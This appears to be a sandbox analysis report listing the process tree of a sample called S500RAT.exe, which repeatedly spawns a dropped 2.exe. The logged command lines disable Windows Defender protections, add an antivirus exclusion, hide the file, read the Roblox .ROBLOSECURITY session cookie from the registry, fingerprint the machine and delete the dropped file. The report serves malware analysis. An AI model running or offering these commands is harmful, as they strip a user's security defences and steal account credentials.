        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:2196
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:1588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        13⤵
        Detects videocard installed
        
        PID:1664
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        13⤵
        
        PID:1560
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        14⤵
        Runs ping.exe
        
        PID:264
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        12⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        13⤵
        Executes dropped EXE
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        13⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:984
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:1868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2864
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:348
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        15⤵
        
        PID:2608
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        14⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        15⤵
        Executes dropped EXE
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        15⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        16⤵
        Executes dropped EXE
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        16⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        17⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:2104
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        18⤵
        Views/modifies file attributes
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:1616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:1960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:1288
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        18⤵
        
        PID:1312
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        Runs ping.exe
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        17⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        18⤵
        Executes dropped EXE
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        18⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        19⤵
        Executes dropped EXE
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        19⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        20⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:1868
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        21⤵
        Views/modifies file attributes
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:1244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:2352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:2080
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        21⤵
        
        PID:2756
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        Runs ping.exe
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        20⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        21⤵
        Executes dropped EXE
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        21⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        22⤵
        Executes dropped EXE
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        22⤵
        
        PID:1200
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        23⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2148
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:536
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        24⤵
        Views/modifies file attributes
        
        PID:2568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:1604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        24⤵
        
        PID:1652
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        Runs ping.exe
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        23⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        24⤵
        Executes dropped EXE
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        24⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        25⤵
        Executes dropped EXE
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        25⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        26⤵
        Executes dropped EXE
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        26⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        27⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:1076
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        28⤵
        Views/modifies file attributes
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:1960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:3040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        28⤵
        
        PID:2084
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        Runs ping.exe
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        27⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        28⤵
        Executes dropped EXE
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        28⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        29⤵
        Executes dropped EXE
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        29⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        30⤵
        Executes dropped EXE
        
        PID:564
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        30⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        31⤵
        Executes dropped EXE
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        31⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        32⤵
        Executes dropped EXE
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        32⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        33⤵
        Executes dropped EXE
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        33⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        34⤵
        Executes dropped EXE
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        34⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        35⤵
        Executes dropped EXE
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        35⤵
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        36⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1612
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        37⤵
        Views/modifies file attributes
        
        PID:2700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:2320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:2384
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        
        PID:2964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:2252
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause
        37⤵
        
        PID:1348
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        Runs ping.exe
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        36⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        37⤵
        Executes dropped EXE
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        37⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        38⤵
        Executes dropped EXE
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        38⤵
        
        PID:812
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        39⤵
        Executes dropped EXE
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        39⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        40⤵
        Executes dropped EXE
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        40⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        41⤵
        Executes dropped EXE
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        41⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        42⤵
        Executes dropped EXE
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        42⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        43⤵
        Executes dropped EXE
        
        PID:1076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:2536
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
        44⤵
        Views/modifies file attributes
        
        PID:808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2888
        
